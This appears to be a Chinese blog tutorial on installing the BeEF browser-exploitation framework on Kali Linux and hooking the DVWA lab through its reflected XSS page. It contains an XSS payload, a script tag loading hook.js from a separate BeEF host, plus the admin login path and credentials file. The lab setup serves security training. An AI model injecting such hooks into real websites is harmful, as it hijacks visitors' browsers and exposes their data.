在kali环境下安装Beef-Xss靶场搭建

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)


一、更新安装包

┌──(root㉿kali)-/home/kali

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)-/home/kali

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)-/home/kali

└─# cd /usr/share/beef-xss

┌──(root㉿kali)-/usr/share/beef-xss

└─# ls -al

┌──(root㉿kali)-/usr/share/beef-xss

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:

相关推荐
云水一下1 天前
DVWA从入门到精通(十):XSS (Reflected)(反射型XSS)
xss·dvwa·反射型
玄玄子1 天前
xss前端解决方案
前端·浏览器·xss
Chengbei1119 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
杨先生哦20 天前
【2026热端攻防系列 3/12】反射型&存储型XSS全解:AI批量免杀、WAF绕过与企业级防御
前端·人工智能·笔记·web安全·xss
一拳一个娘娘腔20 天前
【第七期】漏洞攻防-前端篇:XSS 与 CSRF —— 当浏览器成为攻击者的“肉鸡”
前端·xss·csrf
杨先生哦21 天前
【2026 热端攻防系列 2/12】DOM 型 XSS 深度实战:AI 多态变形免杀 + 全维度防御
前端·人工智能·笔记·安全·web安全·xss
2601_9505264322 天前
第1节:初识C语言
开发工具·环境搭建·初识c语言·c语言特点·c语言应用
xiaofeichaichai22 天前
前端安全 XSS 与 CSRF
前端·安全·xss
hhcgchpspk22 天前
xss漏洞学习笔记
笔记·学习·网络安全·xss